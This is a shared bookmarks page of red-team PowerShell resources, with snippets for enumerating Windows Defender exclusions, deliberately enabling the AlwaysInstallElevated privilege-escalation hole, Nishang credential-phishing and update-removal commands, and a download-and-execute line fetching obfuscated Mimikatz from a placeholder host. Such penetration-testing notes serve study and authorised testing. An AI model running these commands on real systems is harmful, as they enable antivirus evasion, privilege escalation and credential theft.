Search: [powershell] - Shared Bookmarks

Links per page: 20 50 100

14 results tagged powershell x

Abusing Exclusions To Evade Detection | Dazzy Ddos

function Get-DefenderExclusions {
    param (
        [string]$logName = "Microsoft-Windows-Windows Defender/Operational",
        [int]$eventID = 5007,
        [switch]$Path,
        [switch]$Process,
        [switch]$Extension
    )

    if (-not ($Path -or $Process -or $Extension)) {
        Write-Host "Please specify at least one type of exclusion to filter: -Path, -Process, -Extension."
        return
    }

    # Get all event logs with the specified Event ID
    $events = Get-WinEvent -LogName $logName -FilterXPath "*[System[(EventID=$eventID)]]" -ErrorAction SilentlyContinue

    if (-not $events) {
        Write-Host "No events found with Event ID $eventID in the $logName log."
        return
    }

    # Define the regex patterns for exclusion paths, extensions, and processes
    $patterns = @{
        Path = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\([^`"]+)"
        Extension = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Extensions\\([^`"]+)"
        Process = "HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Processes\\([^`"]+)"
    }

    # Function to parse and return unique exclusions
    function Get-UniqueExclusions {
        param (
            [string]$pattern,
            [string]$exclusionType
        )

        $uniqueExclusions = @{}
        foreach ($event in $events) {
            $message = $event.Message
            if ($message -match $pattern) {
                $exclusionDetail = $matches[1] -replace ' = 0x0.*$', '' -replace 'New value:', '' -replace '^\s+|\s+$', ''
                if (-not $uniqueExclusions.ContainsKey($exclusionDetail) -or $event.TimeCreated -gt $uniqueExclusions[$exclusionDetail]) {
                    $uniqueExclusions[$exclusionDetail] = $event.TimeCreated
                }
            }
        }
        return $uniqueExclusions.GetEnumerator() | Sort-Object Value -Descending | ForEach-Object {
            [PSCustomObject]@{
                ExclusionDetail = $_.Key
                TimeCreated = $_.Value
            }
        }
    }

    # Extract and display exclusions based on the provided arguments
    if ($Path) {
        Write-Host "Path Exclusions:"
        Get-UniqueExclusions -pattern $patterns.Path -exclusionType 'Path' | Format-Table -Property ExclusionDetail, TimeCreated -AutoSize -Wrap
    }
    if ($Process) {
        Write-Host "Process Exclusions:"
        Get-UniqueExclusions -pattern $patterns.Process -exclusionType 'Process' | Format-Table -Property ExclusionDetail, TimeCreated -AutoSize -Wrap
    }
    if ($Extension) {
        Write-Host "Extension Exclusions:"
        Get-UniqueExclusions -pattern $patterns.Extension -exclusionType 'Extension' | Format-Table -Property ExclusionDetail, TimeCreated -AutoSize -Wrap
    }
}

# Example usage:
# Get-DefenderExclusions -Path -Process -Extension
# Get-DefenderExclusions -Process

August 12, 2025 at 12:45:27 PM UTC * - permalink -

- https://dazzyddos.github.io/posts/Abusing_Exclusions_To_Evade_Detection/

powershell defender evasion evade

The Most Helpful PowerShell Cheat Sheet You’ll Ever Find
July 31, 2025 at 9:53:27 AM UTC * - permalink -

- https://www.stationx.net/powershell-cheat-sheet/

powershell
Note: Setup vuln alwaysinstallelevated

$RegistryPath1 = 'HKCU:\Software\Policies\Microsoft\Windows\Installer'
$RegistryPath2 = 'HKLM:\Software\Policies\Microsoft\Windows\Installer'
$Name = 'AlwaysInstallElevated'
$Value = '1'

Create the key if it does not exist

New-Item -Path $RegistryPath1 -Force | Out-Null
New-Item -Path $RegistryPath2 -Force | Out-Null

Now set the value

New-ItemProperty -Path $RegistryPath1 -Name $Name -Value $Value -PropertyType DWORD -Force
New-ItemProperty -Path $RegistryPath2 -Name $Name -Value $Value -PropertyType DWORD -Force
April 2, 2022 at 9:44:06 PM UTC - permalink -

- https://shaarli.onemask.me/?-WEM-A

alwaysinstallelevated msi windows privesc powershell
Exploit Monday: 5/13/12 - 5/20/12
February 22, 2022 at 2:37:44 PM UTC - permalink -

- https://web.archive.org/web/20210126074234/http://www.exploit-monday.com/2012_05_13_archive.html

osce delegate reflections powershell assembly
PowerShell load .Net Assembly - PsCustom Object - Hitchikers GUID(e) to Automation
July 20, 2021 at 9:50:46 AM UTC - permalink -

- https://pscustomobject.github.io/powershell/howto/PowerShell-Add-Assembly/

loading assembly powershell c# cs
klezVirus/chameleon: PowerShell Script Obfuscator
June 3, 2021 at 1:29:19 PM UTC - permalink -

- https://github.com/klezVirus/chameleon

obfuscation powershell
SANS Penetration Testing | Pen Test Poster: "White Board" - PowerShell - Built-in Port Scanner! | SANS Institute
June 17, 2020 at 9:35:48 AM UTC - permalink -

- https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/

powershell portscan nmap port scanner
Embedding EXE files into PowerShell scripts |
May 25, 2020 at 8:24:03 PM UTC - permalink -

- https://truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/

powershell obfuscation binary av bypass evasion
Poking Holes in the Firewall: Egress Testing With AllPorts.Exposed - Black Hills Information Security
May 25, 2020 at 5:54:24 PM UTC * - permalink -

- https://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/

egress traffic powershell
How to create dump files remotely (ProcDump) using PowerShell? - Powershellbros.com
October 22, 2019 at 9:52:42 AM UTC * - permalink -

- https://www.powershellbros.com/how-to-create-dump-files-remotely-procdump-using-powershell/

procdump mimikatz remote hacking pentest powershell script scripting redteam
PowerUp: A Usage Guide – harmj0y
March 31, 2019 at 7:04:32 PM UTC - permalink -

- https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

powerup powershell windows exploitation post hacking pentest
Nishang: A Post-Exploitation Framework

Port-Scan

Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Port-Scan.ps1’; Port-Scan –StartAddress 192.168.56.101 –Endaddress 192.168.56.105 –ResolveHost -ScanPort }”

Remove-Update

Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Remove-Update.ps1’; Remove-Update KB2534366}”

Invoke-CredentialsPhish

Powershell.exe –exec bypass –Command “& {Import-Module ‘C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1’; Invoke-CredentialsPhish}”
February 20, 2019 at 11:00:59 PM UTC - permalink -

- https://resources.infosecinstitute.com/nishang-a-post-exploitation-framework/

nishang scripts tool windows post exploitation postex postexploitation hacking pentest powershell
Pwning the Enterprise With PowerShell

PowerMeta - Discover publicly available files, extract metadata, provide information about internal username schema, system names, domain info ... https://github.com/dathack/PowerMeta
MailSniper, powercat, empire, unicorn, dnscat2-powershell, invoke-powershellicmp, ...
February 20, 2019 at 10:17:58 PM UTC - permalink -

- https://fr.slideshare.net/dafthack/pwning-the-enterprise-with-powershell

powersploit powershell windows exploitation post postex postexploitation tools mimikatz powermeta mailsniper empire unicorn
geoda: Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls
https://github.com/danielbohannon/Invoke-Obfuscation
```
PS > Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation
Invoke-Obfuscation > set SCRIPTBLOCK "iEX (New-Object System.Net.WebClient).DownloadString('https://<IP>:<PORT>/obfuscated.ps1'); Invoke-Mimidogz -DumpCred
...
```
February 20, 2019 at 2:24:52 PM UTC - permalink -

- https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html

powershell mimikatz postexploitation postex post exploitation obfuscation kiwi

Links per page: 20 50 100

Create the key if it does not exist

Now set the value

Port-Scan

Remove-Update

Invoke-CredentialsPhish